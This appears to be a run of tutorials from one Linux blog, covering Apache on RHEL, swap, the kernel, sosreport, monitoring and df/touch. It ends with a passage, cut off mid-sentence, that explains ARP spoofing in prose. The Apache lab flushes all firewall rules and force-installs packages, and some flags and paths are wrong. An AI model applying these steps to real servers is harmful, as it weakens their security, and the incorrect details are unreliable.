Apache Web Server in RHEL

Apache Web Server in RHEL
10 Jul 2021 VASANTH NIRMAL

Apache is the most popular and widely used web server in the world, almost 65% of web servers
are running apache. Apache supports in all distributions like Windows, Mac, Solaris. In Linux
Apache is the default web server.
Before we implement the apache webserver in RHEL, Let me explain what do you mean by the
website.
What is a Website?
Website is just an application installed on a computer, The computer probably just has better
specifications than your computer. But fundamentally works exactly just like another system, so
it has an OS and it also has a number of applications to allow it to acts as a webserver.
So a website means it is a collection of web pages for example, when you open amazon.com it is
a website, it does not have a single web page, it has multiple web pages. When you open it you
see the whole webpage, but when you click on a certain product you will be taking towards
different web pages.
The two main applications are:
1.Web Server
2.Database
A web server is like; apache and a database is like; Mysql, Sybase…
And these are the webserver that basically understands and executes the web applications. So
web applications will be written in PHB or python, the only thing is that the webserver needs to
be able to understand and executes this application.
The database contains the data used by the web applications, so all of this is stored on a
computer called the “SERVER”.
https://www.linuxvasanth.com
The computer is connected to the internet and it has a real IP, so anybody can access that
computer and can get it. So the web application is executed by the webserver which is installed
on your server. Therefore any time you request the page or you run the web application it is
actually executed on the web server and it is not executed at the client’s computer.
What is Web Server?

A computer system that hosts websites or a server on the internet that hosts websites. A host
means to serve websites like a website should be placed in such a server and you should be able
to handle it.
So HTTP Server or web server is a network service that serves content to a client over the web,
this typically means web pages.
The difference between the normal system and the webserver is, Normal system is running
webserver software like Apache, IIS, and many more…
The web server system should be connected to the internet in order to act as a webserver
otherwise client, web client can’t contact it through HTTP, it will not be able to act as a web
server.
Typically web server hosts multiple websites, some only host a few, some others host several
hundred, but there are some dedicated servers also, based on that we will categorize web servers
in two parts.
1.Shared Hosts
2.Dedicated hosts
https://www.youtube.com/linuxvasanth
Shared hosts are the webserver that hosts websites for multiple users these are called
shared hosts.
There are some dedicated servers that will be hosting for a single user/company, called
dedicated hosts
So which servers are shared and which one is dedicated? Let’s say there is some personal
website or some small websites which do not have a huge amount of traffic, then those would be
generally hosted on shared hosts.
But when a website has traffic and millions of users accessing then that requires a dedicated
server.
Examples of Web Server:

1.Apache HTTP Server
2.It is Founded by Apache Software foundation.
3.65% of websites runs apache web server.
4.It can be installed on all OS
5.It is an Open source
6.IIS:Internet Information Services) developed by Microsoft
7.Sun Java System web server
8.Jigsaw server
How to configure Apache Web server in RHEL Server?
Two main web servers are available in RHEL
1.Apache
2.Nginx
The Follow packages are required for the apache server
1.httpd It installs the Apache web server
2.mod_ssl It is needed for creating a secure web sites
3.elinks It is required to implement text based web browser

In your server, if you have the yum repository configured then use the below command to install
the packages
#yum -y install httpd

#yum -y install mod_ssl
#yum -y install elinks
Click here to view Yum Repository configuration on RHEL

If you don’t have the yum server configured then you can use the “rpm” tool to install the
required packages as follows
#cd /media/RHEL_6.0\ x86_64\ Disc\ 1/Packages/
# ls httpd*
httpd-2.2.15-5.el6.x86_64.rpm httpd-manual-2.2.15-5.el6.noarch.rpm
httpd-devel-2.2.15-5.el6.i686.rpm httpd-tools-2.2.15-5.el6.x86_64.rpm
httpd-devel-2.2.15-5.el6.x86_64.rpm
How to Configure Local Yum Repository Server using ISO in RHEL 7.0 Ver
As you can see from the above output all the required httpd packages are available in the
Packages directory, Now install the httpd packages as follows
#rpm -ivh httpd* --nodeps --force

Preparing… ########################################### [100%]
1:httpd-tools ########################################### [ 20%]
2:httpd ########################################### [ 40%]
3:httpd-devel ########################################### [ 60%]
4:httpd-devel ########################################### [ 80%]
5:httpd-manual ########################################### [100%]
https://www.linuxvasanth.com/install-packages-redhat-linux/
How to install packages with “rpm” tool

Now install the next package mod_ssl as follows
# rpm -ivh mod_ssl* --nodeps --force

Preparing… ########################################### [100%]
1:mod_ssl ########################################### [100%]
Click here to watch the Apache Webserver configuration Video
Install the elinks package as follows
#rpm -ivh elinks* --nodeps --force

Preparing… ########################################### [100%]
1:elinks ########################################### [100%]
You can check whether all the packages are installed properly by using the following commands
#rpm -qa httpd*

httpd-devel-2.2.15-5.el6.i686
httpd-tools-2.2.15-5.el6.x86_64
httpd-devel-2.2.15-5.el6.x86_64
httpd-manual-2.2.15-5.el6.noarch
httpd-2.2.15-5.el6.x86_64
# rpm -qa mod_ssl*

mod_ssl-2.2.15-5.el6.x86_64
# rpm -qa elinks*

elinks-0.12-0.20.pre5.el6.x86_64
What is KERNEL Program?

Now bring the service to online permanently whenever the server boots up run the following
command as follows,
#chkconfig httpd on
#chkconfig httpd --list
httpd 0:off 1:off 2:on 3:on 4:on 5:on 6:off
Now let us start the httpd service as follows
#service httpd start

Starting httpd: httpd: Could not reliably determine the server's fully qualified domain name, using ::1 for
ServerNam [ OK ]
The above error shows, Httpd service trying to resolve the server IP with the Domain name and it
failed to resolve that, In Production Servers DNS server is used to resolve the IP address with the
Domain name, Here in this tutorial I haven’t yet configured the DNS server due to lack of
servers. But we can use the /etc/hosts file for this purpose, it does the same as the DNS server for
resolving the hostname to IP address.
Now open the network config file /etc/sysconfig/network and change the name of the server to
vasanth.com
#vi /etc/sysconfig/network
NETWORKING=yes
HOSTNAME=vasanth.com
Now restart the system
#init 6
Now verify whether the server name is changed or not
#hostname
vasanth.com
U
nderstanding SWAP Memory(Virtual) in Linux Server.
Now Let me configure the web server as follows
Apache Config file–> /etc/httpd/conf/httpd.conf

Let me explain some of the important parameters we have in this config file:
1)ServerRoot "/etc/httpd" :It stores the config file if you want to share elsewhere you can
change this path
2)Listen 80: When a web server request comes it will enter through this port,This is the default
port for apache web server.
3)Include Conf.modules.d/*.conf:In this you can add additional modules,configurations like for
example you want to install PHP and want to have an website based on the PHP,in that case
you have to addsettings related to apache PHP module.
4)User apache Group apache: Will be responsible to start and check apache services and
daemons.
5)ServerAdmin support@linuxvasanth.com: Any issues related with webserver it send the mail
6)DocumentRoot "/var/www/html": This is the Location where html file or any code related to
website will be stored here.When a browser opens up a page,it looks for the page here in
/var/www/html on the server where pages are served.
NOTE:If this does not exists then the webserver will not be able to serve any web pages
7)DirectoryIndex index.html: When we open a website in a browser it goes to a certain

location /var/www/html there it searches for the name of the certain file that file is
index.html,when a web site is having the index.html file then it will serve the web pages.
In this Lab without firewall i will configure the Apache webserver,So Let me disable the firewall
as follows,
#iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
ACCEPT udp -- anywhere anywhere udp dpt:domain
ACCEPT tcp -- anywhere anywhere tcp dpt:domain
ACCEPT udp -- anywhere anywhere udp dpt:bootps
ACCEPT tcp -- anywhere anywhere tcp dpt:bootps
ACCEPT all -- anywhere anywhere state RELATED,ESTABLISHED
ACCEPT icmp -- anywhere anywhere
#iptables -F
-L =To list all the firewall policies and rules sets
-F =To flush out all the existing policies and rules sets
iptables -L
Chain INPUT (policy ACCEPT)
Chain FORWARD (policy ACCEPT)
Chain OUTPUT (policy ACCEPT)
Check the status of the Apache service
#service httpd status

#service httpd start
Check the port 80 is Listening or Not
#netstat -tulpn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 :::5900 :::* LISTEN 2649/vino-server
tcp 0 0 :::111 :::* LISTEN 1202/rpcbind
tcp 0 0 :::80 :::* LISTEN 4236/httpd
tcp 0 0 :::22 :::* LISTEN 1682/sshd
Until you change the value of DocumentRoot directive in the httpd.conf file, apache will check
for the web pages in its default location /var/www/html directory, Let me create a very basic
html web site as follows
#cd /var/www/html
#vi index.html
<html>
<center> WELCOME TO LINUXVASANTH.COM<center>
</html>
:wq!
#
Now check the configuration for possible errors by using the following command
#service httpd configtest

Syntax OK
How to Configure Local Yum Repository Server using ISO in RHEL 7.0 Ver
If you want the apache webserver service to start automatically at the boot time, run the below
command
#chkconfig httpd on
Now open the browser and check it as follows
As you can see from the above output, when I call the webserver IP address from the search
window, the website (demo) web pages it started serving, We have successfully configured the
apache web server in Linux boxes.
Let me try it from the Windows client system to check whether the webserver is allowing to
access the website web pages
From the above output, the Webserver is working fine, anyone can access the webserver now .
How to restrict a IP to access Webserver?

We can also control who can get the stuff from the webserver, all we have to do is open the
config file and add the IP address with the deny rules.
Let me Restrict the IP 192.168.43.210 which is the windows client system

Let me add the deny rules in the configuration file as follows
#vi /etc/httpd/conf/httpd.conf
Control who can access from webserver
Deny from 192.168.43.210
:wq!
Restart the Apache service to update the configuration details
#service httpd restart

Stopping httpd: [ OK ]
Starting httpd: [ OK ]
Now try access the webserver from the windows client system i.e from the IP 192.168.43.210
As you can see from the above output, It is showing only the test page, it is not allowing to
access the website and its web pages as we have blocked this IP to access the webserver.
Setup Webserver with user name and Password
Let us try to secure the website in the apache web server with the password-based protection, go
to the configuration file and look for the heading control who can get the stuff from a web server
and add the below things as suggested
#vi /etc/httpd/conf/httpd.conf
Allow from all
AuthType Basic
AuthName "Password Restricted Area
AuthUserFile /etc/httpd/userauthfile
Require user rheluser007
:wq!
Now create a User auth File That Will Holds User Accounts
By using the “htpasswd” command we can create and update files used to save the user
names and passwords for the authentication of HTTP users. Resources available from the
Apache HTTP server is restricted to users listed in the files created by the htpasswd command.
#htpasswd -cm /etc/http/userauthfile rheluser007
-c = Create a New file

-n = Password will be encrypted in MD5 algorithm before saving.
Now try to access the Apache web server, this time it will ask you to type the HTTP authorized
user name and password to get the access
#service httpd restart
Stopping httpd: [ OK ]
Starting httpd: [ OK ]
I hope you have enjoyed this article. Do subscribe and share it with your friends
My Youtube Channel
My Facebook Page
My Twitter Page
Click here to Subscribe linuxvasanth.com weekly Updates
1. Apache Web Server in RHEL Server » Vasanth Blog on Understanding SWAP
Memory(Virtual) in Linux Server.July 10, 2021
[…] Understanding SWAP Memory(Virtual) in Linux Server. […]
2. Apache Web Server in RHEL Server » Vasanth Blog on What is KERNEL Program?July

10, 2021
[…] What is KERNEL Program? […]
3. Apache Web Server in RHEL Server » Vasanth Blog on How to install the packages in
Redhat Linux?July 10, 2021
[…] https://www.linuxvasanth.com/install-packages-redhat-linux/ How to install
packages with “rpm” tool […]
4. Apache Web Server in RHEL Server » Vasanth Blog on How to Configure Local Yum
Repository Server using ISO in RHEL 7.0 VerJuly 10, 2021
[…] How to Configure Local Yum Repository Server using ISO in RHEL 7.0 Ver […]
5. Apache Web Server in RHEL Server » Vasanth Blog on Yum configuration in Redhat

Linux 6July 10, 2021
[…] Click here to view Yum Repository configuration on RHEL […]
Leave a comment RHEL Networking apache, DNS, httpd, webserver 10 Jul 2021 VASANTH

NIRMAL
Understanding SWAP
Memory(Virtual) in Linux
Server.
25 May 2021 VASANTH NIRMAL
In this tutorial, we will see what is Swap Memory and how to implement a swap file/partition on
Linux to increase the performance of the server.
What is swap space?

Swap space is a part of a Hard disk drive that is used for virtual memory, Virtual memory is
nothing but, its space where Large programs can store themselves in form of pages while their
execution and only the required pages of processes are loaded in to the main memory or you can
say it is a memory on a hard disk drive to simulate additional main memory
Swap space on a disk that is used when the amount of Main memory(Physical memory) is
Full. When a Linux server is running out of RAM, all the inactive pages are moved from
the RAM to the swap space.
The swap space can be configured either from the dedication partition or from a separate swap
file.
Swap memory can be configured in two methods, In this tutorial, I will show how to configure
with swap dedicated partition.
1.Swap Partition
2.Swap File
Swap Partition:This one is the default swap memory,a hard drive partition that is dedicated to swapping.
Swap File: This one is manually created type swap memory,when there is no space left in the hard drive,swap
file is manually created by the adminstrators.
The Main adavantage of Having the Swap Memory
It stops RAM from running out of space
Backup for enhancing the original space of RAM
It allows to run more/huge applications continously that needs a large amount of RAM.
It always increases the performance of the server.
Swap space is very essential in Linux server
As long as free memory remains below the thershold,no swap space is used.
Ex:1 How to Create a Swap Partition in Linux Server?
We can create a swap partition as a regular partition, by using the “fdisk” command.
How big should your Linux Swap? The Recommended
swap space is
Server with 4GB of RAM or Less require Minimum 2GB of Swap Space
Server with 4GB to 16GB of RAM require Minimum of 4GB of Swap Space
Server with 16GB to 64GB of RAM require Minimum of 8GB of Swap Space
Now let me create a new swap space partition on my /dev/sda Hard disk as follows
Click here to view how to create a partition using the Fdisk utility
#fdisk /dev/sda
WARNING: DOS-compatible mode is deprecated. It's strongly recommended to
switch off the mode (command 'c') and change display units to
sectors (command 'u').
Command (m for help): n

Command action
e extended
p primary partition (1-4)
Partition number (1-4): 3

First cylinder (2682-3916, default 2682):
Using default value 2682
Last cylinder, +cylinders or +size{K,M,G} (2682-3916, default 3916): +2G
Command (m for help): p

Disk /dev/sda: 32.2 GB, 32212254720 bytes
255 heads, 63 sectors/track, 3916 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0x00096237
Device Boot Start End Blocks Id System
/dev/sda1 * 1 2550 20480000 83 Linux
/dev/sda2 2550 2681 1054108+ 83 Linux
/dev/sda3 2682 2943 2104515 83 Linux
Command (m for help): l

0 Empty 24 NEC DOS 81 Minix / old Lin bf Solaris
1 FAT12 39 Plan 9 82 Linux swap / So c1 DRDOS/sec (FAT
Command (m for help): t
Partition number (1-4): 3
Hex code (type L to list codes): 82

Changed system type of partition 3 to 82 (Linux swap / Solaris)
Command (m for help): p

Disk /dev/sda: 32.2 GB, 32212254720 bytes
255 heads, 63 sectors/track, 3916 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0x00096237
Device Boot Start End Blocks Id System
/dev/sda1 * 1 2550 20480000 83 Linux
/dev/sda2 2550 2681 1054108+ 83 Linux
/dev/sda3 2682 2943 2104515 82 Linux swap / Solaris
Command (m for help): w

The partition table has been altered!
Calling ioctl() to re-read partition table.
WARNING: Re-reading the partition table failed with error 16: Device or resource busy.
The kernel still uses the old table. The new table will be used at
the next reboot or after you run partprobe(8) or kpartx(8)
Syncing disks.
#
1.The "p" option gives us the details of avaiable space in the harddisk
2.The option "n" allows us to create a new parition on the Hard disk.
3.Choose the parition method primary or extended,here i have choosen primary "p" method
4.Type the parition number and enter,here i gave the parition number as 3
5.The first avaiable sector for the parition let it be the default one,dont give any value manually unless it is
required,the system takes the default sector.
6.Type the size of the parition in MB/GB/KB
7.Verify the partition by using the "p" option
8.Each and every paritions in the system will use some labels for the system identifier.If you want to display
all the labels numbers type "l" and enter
8.Each and every paritions in the system will use some labels for the system identifier.If you want to display
all the labels numbers type "l" and enter
9.The value 82 is used as the parition identifier for the swap
10.To use the parition for the swap space you must have to change the parition type.
11.Type "t" and press enter
12.Now give 82 and press enter
13.Verify the changes with the "p" option
14.The fdisk command will not save the changes in its memory until we manullay confirm,now type "w" to
save the change in kernel memory
Now reboot and create a new file system on the swap partition as follows
#init 6
After reboot Format the swap partition
As we know in order to store the data in a partition we must have to format the partition,
unlike a regular partition which is used to hold/store the user data, a swap partition is
used to hold/store the system data
mkswap is the command used to format a partition with swap space.
Remember this command will not create a filesystem on the partition, rather it adds the
swap identity in the partition. It stores the signature in a single block of data and left the rest of
the partition unformatted and this unformatted space is used to hold/store the memory pages.
To Format a partition with mkswap command
#mkswap /dev/sda3
Setting up swapspace version 1, size = 2104508 KiB
no label, UUID=cf364f76-6993-44e1-a981-73382d70e4a1
Now we have created a swap a partition in Linux server and now its ready to use for swap space.
Now Activate the swap partition as follows
#swapon /dev/sda3
Now Check the status of the swap space by using the following command
#swapon -s
Filename Type Size Used Priority
/dev/sda3 partition 2104504 0 -1
Run the following command to check the ongoing status of memory
# free
total used free shared buffers cached
Mem: 1400364 296608 1103756 0 28668 102016
-/+ buffers/cache: 165924 1234440
Swap: 2104504 0 2104504
As you can see from the above output swap size 2GB (2104504) created and 0 indicates no
swap space is used so far, which means the server still running with sufficient RAM(memory).
That’s all we have successfully configured the swap space in the Linux server, When the server
running out of physical RAM, it starts using the swap space immediately to enhance the server
performance.
To Mount the swap space permanently you have to add the swap parition details in
the /etc/fstab file
#vi /etc/fstab
tmpfs /dev/shm tmpfs defaults 0 0
devpts /dev/pts devpts gid=5,mode=620 0 0
sysfs /sys sysfs defaults 0 0
proc /proc proc defaults 0 0
/dev/sda2 /hbo ext4 defaults 0 0
/dev/sda3 swap swap defaults 0 0
1.The parition which we want to mount(/dev/sda3)
2.The mount point dir name(swap)
3.The Filesystem type for the partition(swap)
4.The default options(read and write)
5.To activate dump on this device give 1 otherwise give 0
6.To check for any error during booting by fsck,to enable 1,to disable 0
Note: Swap space is only used when the Main memory utilization extends the
threshold
I hope all of you have enjoyed this article,Kindly do visit and Subscribe My Social Network
Links given Below
Click here to Subscribe linuxvasanth Weekly Updates

Click here to Subscribe linuxvasanth YouTube Channel
Click here to Subscribe linuxvasanth Facebook Page
10, 2021


1 Comment RHEL(Red Hat Enterprise Linux) Disk parition, fdisk, linux

swap, RAM, swap, swap parition, swapon, virtual memory 25 May 2021 VASANTH NIRMAL
What is KERNEL Program?

In this article I would like to give a small brief about the kernel, What is a kernel? Why Kernel?
What does it do?
The Kernel is a Program that composes the central core of an Operating system. It has complete
control over everything that occurs in the system.
A Kernel can be compared with a shell(like bash, Korn, bourne, etc…in UNIX Based OS)
which is the outermost part of the operating system and a program that communicates with users
executable commands. The kernel itself never interacts directly with the user, but rather interacts
with the shell and other programs as well as with the hardware devices on the system like hard
disk, CPU, Memory, etc…
During the system booting process, Kernel is the first part of the Operating
system that gets loads in to the memory and it remains there for the entire
duration of the system session because its services are required continuously.
Because of its critical nature, the kernel code is usually loaded in to the safest area in the
memory, which prevents it’s from being over-written by someone or by application programs.
The kernel performs its tasks, executing processes, handling the interrupts in the kernel space,
everything a user normally does inserting the text in a text editor, running program
in GUI(Graphical User Interface) is done in userspace. This separation is made in order to
prevent user data and kernel data from interfering with each other and thereby it keeps the
system away from crashing or unstable.
When a system crashes, it actually means the kernel has crashed. If only a single program has
crashed but the rest of the system remains in operation, then the kernel itself has not crashed. A
crash is a situation in which a program or user application stops performing its expected
functions and responding to other parts of the Operating system. The program might appear to
the user to freeze. If such a program is critical to the operation of the kernel, the entire system
could shut down.
The kernel provides basic services for all other parts of the OS, like Memory management,
Process management, File management, and Input and Output Management(which means
accessing peripheral devices). These services are requested by other parts of the OS or
application programs through a specified set of program interfaces referred to as “system calls”
Process Management, The most important aspects of a kernel to the user, is a part of the kernel
that ensures that each process obtains its turn to run on the processor and that individual
processes do not interfere with each other by writing to their areas of memory, A process also
referred to as a task, can be defined as an executing(running) instance of a program.
The Kernel should not get confused with BIOS, The BIOS is an independent program stored in a
chip on the motherboard that is used during the booting process for doing the tasks such
as initializing the hardware and loading the kernel in to the memory. The BIOS always
remains in the system and is specific to its particular hardware, the Kernel can be easily
replaced or upgraded the OS and in the case of Linux, by adding a newer kernel or
modifying the existing kernel.
Most kernels have been developed for a specific Operating system. and usually only one version
available for each Operating system. For example, Microsoft Windows 2000 Kernel is the only
kernel for Microsoft Windows 2000 and Microsoft 98 kernel is the only kernel for
Microsoft Windows 98.
But LINUX is far more flexible in that there are numerous versions of
the Linux kernel, and each of these can be modified in innumerable ways
by a registered user.
A few kernels have been designed with the goal of being suitable for use with any OS, The best
known of these is the “Mach Kernel” used in the Macintosh OS X operating system.
The term Kernel is frequently used in Books and in discussions about Linux, whereas it is used
less often when discussing some other operating systems, Such as Microsoft Windows
Systems. The reasons are that the kernel is highly configurable in the case of Linux and
users are always encouraged to study about and modify it and to download and install the
latest versions. With the Microsoft Windows Operating systems, in contrast, there is
relatively little point in discussing kernels because they cannot be modified or replaced.
I hope you have learned the basics of the Kernel.
Click here to Subscribe to linuxvasanth.com for More Tutorials

You can also follow me on My Social Networking Pages below
Youtube
Instagram
FaceBook Page

10, 2021


 Apache Web Server in RHEL

 Understanding SWAP Memory(Virtual) in Linux Server.
 What is KERNEL Program?
 How to Configure Local Yum Repository Server using ISO in RHEL 7.0 Ver
 What is Systemd(systemctl) Dameon in RHEL 7/RHEL 6
1 Comment RHEL(Red Hat Enterprise
Linux) BIOS, BOOTING, BOOTLOADER, kernel, Linux, linux
kernel, MEMORY, Operatingsystem, unix 4 May 2021 VASANTH NIRMAL
How to Generate Sosreport in

Linux Server(RHEL
6.x/RHEL 7.X)
9 Mar 2021 VASANTH NIRMAL
Linux Diagnostic and Trouble Shooting provides system administrators with the tools and
techniques they need to successfully check and resolve many types of problems that could
present themselves.
Troubleshooting is the art of handling a problem, collecting the information about it, analyzing
it, and at the last solving it, while fixing an issue is one of the major parts of troubleshooting, as
many admins know there are two parts that can’t be skipped, Documenting the Problem and
Root Cause Analysis(RCA).
Let me tell you how to resolve an issue with the redhat resource support
What is an Sosreport on Linux Server?

Sosreport is a powerful command that collects configuration information, system pieces of
information, and diagnostic information of your Linux server like Kernel version, service files,
Loaded modules. This command will also run the external program to collect further details and
stores the output in the resulting archive format.
Sosreport is required when you have opened a case with Redhat for technical assistance. The
Redhat support engineers will ask you for the sosreport of your server for troubleshooting
purposes.
To execute the sosreport,sos package must be installed before,if it is not installed then try install
it with the “yum” command
#yum install sos
The output of the sosreport is the common beginning point for the Redhat Technical engineers
when they performing the initial analysis of a service request for the RedHat Enterprise Linux
Servers.
Ex:1 How to create a sosreport to aid Redhat Support in Resolving an

issue?
Before we run make sure the sos packages are already installed on your server by using the
following command
#rpm -qa sos


Linux Server Monitoring Commands/Tools
As you can see from the above output the sos package is installed.
Click here to watch SOSREPORT Examples on My Youtube Channel

#sosreport
123456=Is the service ticket number(you have to provide the registerd service request number with Redhat)
vasanth=Username of the technical person
Once it has completed,sosreport will create a compressed file under the /tmp path(RHEL 6 and
earlier) and /var/tmp(For RHEL 7 and above)
Ex:2 To Print all the available Modules(Plugins) run the below command
#sosreport -l
Many times the support team will ask you the sosreport with some specific options, for
example, there is an issue that is going on with the apache web server, the support team is
asking to run the sosreport with the apache plugin for analysis.
Ex:3 To get the particular plugin sosreport run the following command
#sosreport -k apache.log
You can also untar the sosreport from the /tmp path for analysis
#cd /tmp
#ls
sosreport-vasanth.123456-20210309121144-0a42.tar.xz
#tar -xvf sosreport-vasanth.123456-20210309121144-0a42.tar.xz
#ls
MYserver-2021030912111615272085
Now that would be easy for the support team to check all the files, all the config files related to
the apache, so you need not to worry about what plugins you need to run, many times I have seen
that the support team will ask you, you have to run the sosreport with that options, so that would
be easy for us and for them to troubleshoot the issue.
I hope all of you enjoyed this article .
Click here to Visit My YouTube Channel

Click here to Visit My Facebook page

10, 2021


3 Comments RHEL(Red Hat Enterprise

Linux) bootissue, kernel, sosreport, supportdata, troubleshooting 9 Mar 2021 VASANTH
NIRMAL
Linux Server Monitoring

Commands/Tools
Linux Distributions comes up with tons of Monitoring tools ,these tools gives the admins and
reterive the information about the server activities.
Admins can use these tools to find the cause of a performace issues.Let me give you some
important default tools as well some add-on tools to monitor the Linux server Health.
Mpstat:
mpstat tool writes to standard output activities for each available processor, processor 0 being
the first one. Global average activities among all processors are also reported. This command
will give you the full CPU utilization report.
Ex:1 To Print the Five reports of Global statistics
among all processors at two-second intervals
#mpstat 2 5
ARP-Born to be Hacked Protocol
The interval parameter specifies the amount of time in seconds between each reports
Note: /proc Filesystem must be mounted for the "mpstat" command to work
Ex:2 To print statistics about users connect time
ac command without options will print out the report of connect time(in hours) based on the
Login/Logouts in the current wtmp file
#ac
total 1030.04
Ex:3 To print the statistics for each day
Use the option -d will dispaly you the total Login time in hours by day wise
#ac -d
https://www.linuxvasanth.
com
Ex:4 To Print time totals for each user in Hours
with -p option will display the Total login for each and every user in Hours

Ex:5 To Print individual user Time details
If you want to print the total Login time statistics for a user(for example Nirmal) in hours
https://www.linuxvas
anth.com
Ex:6 To Print the Date wise Login Time of User
Use the -d option with the ac command will print the date wise Login time for user “root“
https://www.li
nuxvasanth.com
Ex:7 How to Execute a Command with TimeLimit?
By Default Linux comes with a Lot of default tools, each and every command is very unique and
used in different cases. By using this “timeout” command user can set a time limit for any
command you want, once the given time expires, it stops executing the command
timeout=It runs a command with Time Limit,start a command and kill it if still running after NUMBER seconds
Syntax to run the timeout command:
#timeout <options> <Durations> <command>
Ex:8 To run a command with a timeout seconds?
Use a command with some timeout value in seconds,Let us try to use it with the “ping”
command ,timeout the ping command after 8 seconds
#timeout 8s ping google.com
Important and Useful “df” and “touch” Commands in Linux/UNIX
Note:With out adding the seconds(s) with the value will also work
#timeout 8 ping google.com
You can also use the following options as per the requirement
-m =In Minutes
-h =In Hours
-d =Representing days
Ex:9 To Timeout Monitoring a Log File after 5s

seconds
#timeout 5s tail -f /var/log/secure


10, 2021

 General
 RedHat 7.0
 RHEL Networking
 RHEL(Red Hat Enterprise Linux)
 SHELL SCRIPTING
 SOLARIS
 UNIX
1 Comment RHEL(Red Hat Enterprise Linux) Linux, monitoring, networking, timeout 1 Mar
2021 VASANTH NIRMAL
Important and Useful “df”

and “touch” Commands in
Linux/UNIX
13 Dec 2020 VASANTH NIRMAL
There are Lots of commands available to get the details of the disk space usage, Linux has a
strong command “df”(Disk File System) that comes by default on all Linux based OS. This
command is very much useful in getting the information’s on available disk space and disk space
usage on the Linux file system.
In this tutorial, I will explain an easier way to get the disk space usage details on Linux file
systems
Ex:1 To Check Disk Space Usage

The “df” command will display the details of the device name, total blocks, available blocks,
usage, where the filesystem is mounted.

As you can see from the above output, it is showing the partition name, total size, usage size,
Available size, and where it is mounted.
EX:2 Display Info about all Filesystem/Partition

This is similar to the previous example will display the file system details, but here it will also
display the temporary filesystem information along with the memory utilization

https:///www.linuxvasanth.com
Ex:3 To Print the Details Of a Particular
Partition/Filesystem?
When you run the “df” command without any argument it will display all the filesystem
information on your console, When you want to print only particular filesystem information then
you can add that at the argument

Ex:4 To Display the Size in Human Readable Format
As you can see from the above examples, the sizes are unreadable, to view the sizes in MB, KB,
GB(Ex:12M,2G,4K) format you will have to use the option -h along with the “df” command,
here -h indicate Human readable format.
Ex:5 To Print the size in MB
To print the size in MB ,use the -m option with the “df” command
Ex:6 To Print the File system Inode Usage details
With the “df” command add the -i option to print the inode usage for a File system.
Ex:7 To Print the File System Type
As you can see from the output of the previous example, you will not see the tab “Filsystem
Type“.To get that use the “-T” option with the “df” command
https://www.youtube.com/linuxvasanth
Ex:8 To Include a Particular File System type
If you want to display only a certain file system type then use the -t option with the df command.
Touch Command Usages
the touch command is a handy one to generate a file, modify the time stamp details in UNIX and
Linux based systems. With the touch command, we can use some options for various purpose, let
us see the options first
 t, Creates a File using a specified time

 d, Update the access and modification time details
 m, Change the modification time only
 r, Use the access and modification times of a file
Ex:1 To Create an Empty File
To generate a empty file use the following syntax
Ex:2 How to Change File Access and Modification
Time
If you want to change or update the last access and modification time of a file say for
example /mydoc , then use the -a option as follows, this will set the current time and date on a
file.
Note: If the file /mydoc does not exist, it will create a new file with the name.
Ex:3 How to Change File Modification Time
When you want to change only the modification time for a file means use the -m option with the
touch command
Ex:4 To use the Time Stamp of Another File
use the -r option with the touch command, will update the timestamp of “myfile” with the time
stamp of “mydoc” file, So then both the file holds the same time stamp.
Ex:5 How to create a file using a Specified Time stamp
detail
If you want to create a file with a specified time then use the following syntax
#touch -t YYMMDDHHMM.SS <file name>

For example, the below command will create a file “backup” with the time stamp of 14:40:55
on February 12, 2021
If you want to know more about the “df” and “touch” commands you can use the
command “man df and man touch”.

10, 2021



Leave a comment RHEL(Red Hat Enterprise Linux) create file, disk usage, file
system, Linux, unix 13 Dec 2020 VASANTH NIRMAL
ARP-Born to be Hacked
Protocol
8 Oct 2020 VASANTH NIRMAL
Address Resolution Protocol(ARP) is a Network-Based protocol that is used to check out the
MAC address/Hardware address of a device(host/hardware) from an IP address,i.e the ARP is to
convert a 32-bit IP address to 48-bit MAC address.
How does it Work?
As we know in order to communicate with the systems in a network, the source wants to check
and find out the MAC address of the destination device in its ARP table/cache. If the MAC
address info is available, then it will use the MAC address for communication. Almost in all
Operating systems, we can use the command arp -a to list the MAC and IP details from the ARP
table.
Why ARP is not secured?
For example in a network we have four systems, all the devices are connected to the same
network, Lets assume Device A needs to communicate with Device C, also assume that Device
A knows the IP address of Device C, As we know to communicate these devices within the same
network Device A needs to know the MAC address of Device C.
So now what this client does (DEVICE A) it uses the ARP protocol, which means basically, it
sends a Broadcast message (Sends an ARP request to all the clients on the network) saying who
has 10.0.2.6.
Encrypt and Decrypt A File Data Using GPG/PGP Algorithms
Now all of the devices will ignore this packet except the one that has this IP address 10.0.2.6,
this way Device A will have the MAC address of Device C and now it will be able to
communicate with Device C, So all of this communication is facilitated using the ARP protocol.
Device A IP Address: 10.0.2.7
Device B IP Address: 10.0.2.5
Device C IP Address: 10.0.2.6
Router IP Address: 10.0.2.1
ARP all it has is Request and Response, so each computer will have an ARP table which Links
IP address on the same network to their MAC address, As you can see from the below output the
router IP is linked with its MAC address
https
://www.linuxvasanth.com
The main reason why ARP is not secure is coz first of all clients can accept responses even if
they did not send a request. Anyone can send a response to the access point and a response to the
victim telling them I am at a specific IP without them asking who am I or without them asking
for this IP I am just gonna send a response and they are gonna accept that response anyway, not
only that they are also not going to verify who am i.
Click here to Visit My Youtube Channel

So when I say I am at 10.0.2.7 I am clearly not at that IP, the access point will Trust this and
update its ARP table based on the information I sent. These weaknesses will allow the hacker to
run an ARP spoofing attack to gain full access to the target system/server.
The attackers/Hackers uses the normal ARP spoofing by spoof the Gateway/Router IP address,
he will able to capture all the traffic going to other networks as well.
How To Take LVM Volume Live Snap Shot?

Because of this weakness attackers could exploit by send two responses
1.One to the victim

2.One to the gateway
Attackers tell the gateway/router that I am at the IP of the victim, so the access point will update
its ARP table and it will associate the IP of the target with my MAC address.
Attackers will do the same with the victim, so they will send it an ARP response, they are gonna
tell it that I am at 10.0.2.1, so it’s gonna update its ARP table and associate the IP
of 10.0.2.1 with my own MAC address, so the result of this is the victim is gonna think that I am
the router and the router is gonna think that I am the victim.
So anytime the victim wants to send any requests, the requests will have to flow through the
attacker system and he will forward it to the router, and anytime the router wants to send
